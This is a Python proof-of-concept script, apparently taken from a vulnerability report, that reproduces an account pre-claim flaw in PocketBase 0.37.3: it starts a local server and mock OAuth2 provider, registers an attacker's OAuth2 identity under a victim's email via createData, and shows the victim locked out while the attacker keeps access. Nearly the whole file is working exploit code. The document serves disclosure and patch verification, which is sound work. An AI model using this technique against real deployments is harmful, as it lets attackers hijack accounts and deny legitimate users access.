"""poc.py -- CVE-2026-44166 exploit, verbatim from the maintainer report. Pre-claims a victim's email on a vulnerable PocketBase build (0.37.3) via auth-with-oauth2 createData, then shows the victim is permanently locked out while the attacker keeps access. Output matches the report's expected block. To confirm the patch fixes it, see verify_fix.py. """ import subprocess, time, shutil, os, json import urllib.request, urllib.error import mock_oauth2_server mock_oauth2_server.start() time.sleep(0.3) PB_EXE = "pocketbase.exe" if os.name == "nt" else "pocketbase" PB_BIN = os.path.join(os.path.dirname(__file__), "bin_0.37.3", PB_EXE) PB_DATA = os.path.join(os.path.dirname(__file__), "pb_data_poc") if os.path.exists(PB_DATA): shutil.rmtree(PB_DATA) subprocess.run([PB_BIN, "superuser", "upsert", "admin@poc.test", "Admin1234!", f"--dir={PB_DATA}"], check=True, capture_output=True) pb = subprocess.Popen([PB_BIN, "serve", "--http=127.0.0.1:8090", f"--dir={PB_DATA}", "--automigrate=false"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) time.sleep(3) def api(method, path, body=None, token=None, soft=False): req = urllib.request.Request("http://127.0.0.1:8090" + path, json.dumps(body).encode() if body else None, {"Content-Type": "application/json", **({"Authorization": f"Bearer {token}"} if token else {})}, method=method) try: with urllib.request.urlopen(req) as r: return json.loads(r.read()) except urllib.error.HTTPError as e: b = e.read().decode() if soft: return {"_err": e.code, "_body": b} raise RuntimeError(f"HTTP {e.code}: {b}") try: admin_tok = api("POST", "/api/collections/_superusers/auth-with-password", {"identity": "admin@poc.test", "password": "Admin1234!"})["token"] api("POST", "/api/collections", { "name": "members", "type": "auth", "createRule": "", "oauth2": {"enabled": True, "providers": [{ "name": "oidc", "clientId": "x", "clientSecret": "x", "authURL": "http://127.0.0.1:8089/authorize", "tokenURL": "http://127.0.0.1:8089/token", "userInfoURL": "http://127.0.0.1:8089/userinfo", "pkce": False }]} }, admin_tok) # STEP 1: Attacker registers using their own OAuth2 code but victim's email r1 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost", "createData": {"email": "victim@company.com"} }) print(f"[1] Attacker token issued for: {r1['record']['email']} (verified={r1['record']['verified']})") # STEP 2: Victim tries to log in -- permanently blocked r2 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "victim_code", "redirectURL": "http://localhost" }, soft=True) print(f"[2] Victim login: HTTP {r2['_err']} -- {json.loads(r2['_body']).get('message')}") # STEP 3: Attacker re-authenticates after any victim login attempt -- still works r3 = api("POST", "/api/collections/members/auth-with-oauth2", { "provider": "oidc", "code": "attacker_code", "redirectURL": "http://localhost" }) print(f"[3] Attacker re-auth: {r3['record']['email']} -- same record: {r3['record']['id'] == r1['record']['id']}") finally: pb.terminate()